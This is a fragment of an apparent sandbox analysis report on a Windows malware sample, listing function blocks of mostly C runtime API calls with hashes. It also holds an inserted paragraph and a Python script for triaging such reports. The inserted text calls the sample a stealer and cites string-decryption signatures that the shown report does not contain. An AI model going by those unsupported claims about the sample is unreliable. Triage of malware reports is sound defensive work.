• TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00EE7328,000000FF,?,00EC892E), ref: 00ECBBC3
• TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00EE7328,000000FF,?,00EC892E), ref: 00ECBBDA
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                                                  • String ID: (s
                                                                                                                                                                                                                                                                  • API String ID: 66001078-975861361
                                                                                                                                                                                                                                                                  • Opcode ID: 129504b57bce177ef5e99c910deff0a945ad710543ccc2b3227d2884fcb298cf
                                                                                                                                                                                                                                                                  • Instruction ID: 94e7163b6567e51111c7f1915604823b15086816f85ea2489b8becac689c963c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 129504b57bce177ef5e99c910deff0a945ad710543ccc2b3227d2884fcb298cf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E41243090060ADFCB20DF65C682EAAF3E4EB44314F10596EE456A7654D732A986CB51
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClassHandleMessageModuleRegister
                                                                                                                                                                                                                                                                  • String ID: ($Melon$Z
                                                                                                                                                                                                                                                                  • API String ID: 1585107554-3138928526
                                                                                                                                                                                                                                                                  • Opcode ID: 7e98c2c8e981332dd0d001387cefc6b22843ec89c77192ae5248fd1c9798e86a
                                                                                                                                                                                                                                                                  • Instruction ID: 34eb792b3045beabb2a316b12ad6307e0cd064ea2cd061c0b99f69f6f571a699
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e98c2c8e981332dd0d001387cefc6b22843ec89c77192ae5248fd1c9798e86a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5621C8B1905208DFDB44DFA8D5897AEBBF0BF88304F11882EE449EB254E7759948CB42
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00ECBEE2
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00ECBEF0
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00ECBF01
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                                                  • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                                                  • Opcode ID: 8393424676c3392d0f6ee1a19c60452009682470be79533b4cc8c69603657fb5
                                                                                                                                                                                                                                                                  • Instruction ID: e6f67c25b4bc476f9b084fcc7585ab54226df19fc6533a2d2362dec9db6c1c69
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8393424676c3392d0f6ee1a19c60452009682470be79533b4cc8c69603657fb5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10D0A7756063986F93005F737C0C8763FA4DFC43003014112F800F3222F2B05604CB50
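The function blocks in this section are flattened text, and the GetModuleHandleW/GetProcAddress pair above (resolving GetSystemTimePreciseAsFileTime and GetTempPath2W) next to the ___vcrt_Fls* and SRW-lock helpers in the neighbouring blocks is characteristic of the statically linked MSVC runtime's own start-up code rather than of the stealer's import resolution. The Python below is an added example (not Joe Sandbox's code and not from the sample) that parses blocks in exactly this layout into records, derives each function's start address from its lowest `ref:`, lists the names a block resolves through GetProcAddress, and separates CRT-style compatibility resolution from resolution of anything else, which is where a reverser would look first for the routine behind the report's string-decryption and encrypted-strings signatures. The `CRT_RUNTIME_RESOLVED` set is an illustrative assumption, not an exhaustive list; the sample text is constructed from lines on this page.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: two function blocks in the layout of this report section
# (API, ID and hash lines copied from the blocks above; bare headings kept as-is).
SAMPLE_REPORT = """\
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00ECBEE2
• GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00ECBEF0
• GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00ECBF01
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: AddressProc$HandleModule
• String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
• Instruction Fuzzy Hash: 10D0A7756063986F93005F737C0C8763FA4DFC43003014112F800F3222F2B05604CB50
APIs
• GetLastError.KERNEL32(?,?,00ED6109,00ECC977,00ECB7A5), ref: 00ED6120
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00ED612E
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00ED6147
• SetLastError.KERNEL32(00000000,00ED6109,00ECC977,00ECB7A5), ref: 00ED6199
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Similarity
• API ID: ErrorLastValue___vcrt_
• Instruction Fuzzy Hash: 8A01283211AB115EA63517766C8597726E4EB65379320222FF128753F2EF210C5AD140
"""

# "• Name.MODULE(args), ref: ADDR"  or  "• Name.MODULE ref: ADDR"
API_LINE = re.compile(
    r"^•\s*(?P<name>\S+?)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*?)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$"
)
KV_LINE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")
HEX_OR_UNKNOWN = re.compile(r"[0-9A-Fa-f]{8}|\?")

# Assumption (illustrative, not exhaustive): APIs the statically linked MSVC runtime
# resolves via GetProcAddress itself so one binary runs on older Windows builds.
# A GetProcAddress to one of these is expected CRT behaviour, not import hiding.
CRT_RUNTIME_RESOLVED = {
    "GetSystemTimePreciseAsFileTime", "GetTempPath2W",
    "FlsAlloc", "FlsFree", "FlsGetValue", "FlsSetValue",
    "InitializeCriticalSectionEx", "CreateEventExW", "CreateSemaphoreExW",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)

    @property
    def start(self):
        # Lowest referenced address approximates the function's start.
        return min((c.ref for c in self.apis), default=None)

    def procaddress_targets(self):
        """Names resolved at run time: last GetProcAddress argument that is not a hex value or '?'."""
        out = []
        for c in self.apis:
            if c.name == "GetProcAddress" and c.args and not HEX_OR_UNKNOWN.fullmatch(c.args[-1]):
                out.append(c.args[-1])
        return out


def parse_report(text):
    """Split flattened report text into FunctionBlock records.
    'Instruction Fuzzy Hash' is the last bullet of every block, so it closes one."""
    blocks, cur = [], FunctionBlock()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            cur.apis.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
            continue
        m = KV_LINE.match(line)
        if not m:
            continue  # bare section headings such as "APIs" or "Similarity"
        key, value = m.group("key").strip(), m.group("value").strip()
        if key == "Associated":
            cur.meta.setdefault("Associated", []).append(value)
        else:
            cur.meta[key] = value
        if key == "Instruction Fuzzy Hash":
            blocks.append(cur)
            cur = FunctionBlock()
    if cur.apis or cur.meta:  # a trailing block cut off before its hash line
        blocks.append(cur)
    return blocks


def classify(block):
    """'crt' for runtime helper code, 'dynamic-resolution' when GetProcAddress targets
    something outside the CRT set, 'static' for ordinary imports, 'no-apis' otherwise."""
    if not block.apis:
        return "no-apis"
    targets = set(block.procaddress_targets())
    if targets - CRT_RUNTIME_RESOLVED:
        return "dynamic-resolution"
    modules = {c.module for c in block.apis}
    if targets or modules & {"LIBVCRUNTIME", "LIBCMT", "LIBCMTD"}:
        return "crt"
    return "static"


def summarize(text):
    """One row per block: start address, source dump, classification, resolved names."""
    rows = []
    for b in parse_report(text):
        rows.append({
            "start": f"{b.start:08X}" if b.start is not None else None,
            "source": (b.meta.get("Source File") or "").split(",")[0],
            "class": classify(b),
            "resolves": b.procaddress_targets(),
        })
    return rows


if __name__ == "__main__":
    for row in summarize(SAMPLE_REPORT):
        print(row)
```

Run it on the text of a whole report (after stripping the page's leading whitespace and the "Download File" widget text) and sort the rows by class: the `dynamic-resolution` rows are the candidates for the sample's own resolver, while `crt` rows such as the two above can be set aside.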
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 004b9e1b480a18b37fe7a99cffea481ccda5990e3e9c650d887b91d8b1f9e0f6
                                                                                                                                                                                                                                                                  • Instruction ID: 654ca8a0ae61b83ab0566c89ea852e82e938eb2f64c6237b969a1a07621c744f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 004b9e1b480a18b37fe7a99cffea481ccda5990e3e9c650d887b91d8b1f9e0f6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECB10770A0428DAFDB12DFAAC880BBE7BF0EF49314F145159E5457B392C7B09982CB51
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00ED6109,00ECC977,00ECB7A5), ref: 00ED6120
                                                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00ED612E
                                                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00ED6147
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00ED6109,00ECC977,00ECB7A5), ref: 00ED6199
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
APIs
• type_info::operator==.LIBVCRUNTIME ref: 00ED6AF9
• CallUnexpected.LIBVCRUNTIME ref: 00ED6D72
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Similarity
• API ID: CallUnexpectedtype_info::operator==
• String ID: csm$csm$csm
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A38A0892,?,?,00000000,00EE7345,000000FF,?,00ED145E,00000002,?,00ED14FA,00ED415D), ref: 00ED13D2
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00ED13E4
• FreeLibrary.KERNEL32(00000000,?,?,00000000,00EE7345,000000FF,?,00ED145E,00000002,?,00ED14FA,00ED415D), ref: 00ED1406
Strings
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
APIs
• __alloca_probe_16.LIBCMT ref: 00ED8BBB
• __alloca_probe_16.LIBCMT ref: 00ED8C84
• __freea.LIBCMT ref: 00ED8CEB
  • Part of subcall function 00ED7381: RtlAllocateHeap.NTDLL(00000000,00ED935A,?,?,00ED935A,00000220,?,00000001,?), ref: 00ED73B3
• __freea.LIBCMT ref: 00ED8CFE
• __freea.LIBCMT ref: 00ED8D0B
Similarity
• API ID: __freea$__alloca_probe_16$AllocateHeap
• String ID:
APIs
• __EH_prolog3.LIBCMT ref: 00EC94C6
• std::_Lockit::_Lockit.LIBCPMT ref: 00EC94D1
• std::_Lockit::~_Lockit.LIBCPMT ref: 00EC953F
  • Part of subcall function 00EC93C8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00EC93E0
• std::locale::_Setgloballocale.LIBCPMT ref: 00EC94EC
• _Yarn.LIBCPMT ref: 00EC9502
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1088826258-0
                                                                                                                                                                                                                                                                  • Opcode ID: a50bce4b115d80a511112ed45c2009574a752749a08d054c11ec917a28732eed
                                                                                                                                                                                                                                                                  • Instruction ID: cbe599f8991c1654dc076714abe59b02939522d981eafdcf5651c1842c3acd8b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a50bce4b115d80a511112ed45c2009574a752749a08d054c11ec917a28732eed
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B701BC75A012519FC70AEB21DA4AA7C7BA1BFC4350B16100CE801B7382CB35AF47CB81
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00EE1C4D,00000000,?,00EF40C8,?,?,?,00EE1B84,00000004,InitializeCriticalSectionEx,00EEB2A4,00EEB2AC), ref: 00EE1BBE
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00EE1C4D,00000000,?,00EF40C8,?,?,?,00EE1B84,00000004,InitializeCriticalSectionEx,00EEB2A4,00EEB2AC,00000000,?,00ED702C), ref: 00EE1BC8
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00EE1BF0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                  • Opcode ID: abe0d1c9f09e863dff80438ed1434499166081d1a082b258459391706f8c5645
                                                                                                                                                                                                                                                                  • Instruction ID: c58998ee74210474e7510b36ce835fd38595e691329f6239349ec2a47d49640a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: abe0d1c9f09e863dff80438ed1434499166081d1a082b258459391706f8c5645
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DEE01A3068428DFBEB101BA2EC06F293B58AB94B45F145060F90CB80A2FBB199959684
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetConsoleOutputCP.KERNEL32(A38A0892,00000000,00000000,?), ref: 00EDF36C
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED7491: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ED8CE1,?,00000000,-00000008), ref: 00ED74F2
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00EDF5BE
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00EDF604
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00EDF6A7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2112829910-0
                                                                                                                                                                                                                                                                  • Opcode ID: 838c9274e1b6fdfdac9e2db9aeded13f77529d690ec4a2c556d5ccb9fc26e239
                                                                                                                                                                                                                                                                  • Instruction ID: 15f8eda0827bcd91548bfc4bdde20d3b15117a5b0439552c22db9d769cdf6772
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 838c9274e1b6fdfdac9e2db9aeded13f77529d690ec4a2c556d5ccb9fc26e239
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3D15BB5D002489FCB15CFA8D8809EDBBF5EF49314F28516AE866FB361D630E946CB50
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AdjustPointer
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                  • Opcode ID: aaaf30060a30b50657509f90ea2ed1e5c83d99b42512320c9ba9e4167de977df
                                                                                                                                                                                                                                                                  • Instruction ID: 25170693436454574e43debeeea99477216b73696dad3bb4b4a00726167a0be7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaaf30060a30b50657509f90ea2ed1e5c83d99b42512320c9ba9e4167de977df
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4510279A006069FEB288F50C941BBAB7B4EF54718F24552FE805B73A1E732EC42D790
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED7491: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ED8CE1,?,00000000,-00000008), ref: 00ED74F2
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00EDD199
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00EDD1A0
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00EDD1DA
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00EDD1E1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide
• String ID:
• API String ID: 1913693674-0
• Opcode ID: 0a77cd9fb4c9948a7dba218f0058ab721715d8ef4dc17964d12b40b6719d9018
• Instruction ID: efecc5e844cbc9b1ecf4b1e6e24f1d9a28fbef722fabbc74f2ac51158c5fbdb9
• Opcode Fuzzy Hash: 0a77cd9fb4c9948a7dba218f0058ab721715d8ef4dc17964d12b40b6719d9018
• Instruction Fuzzy Hash: 0221B372609215BF9B21AF768C8096AB7E9EF44368710951AF829B7341DB35EC42CB90
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
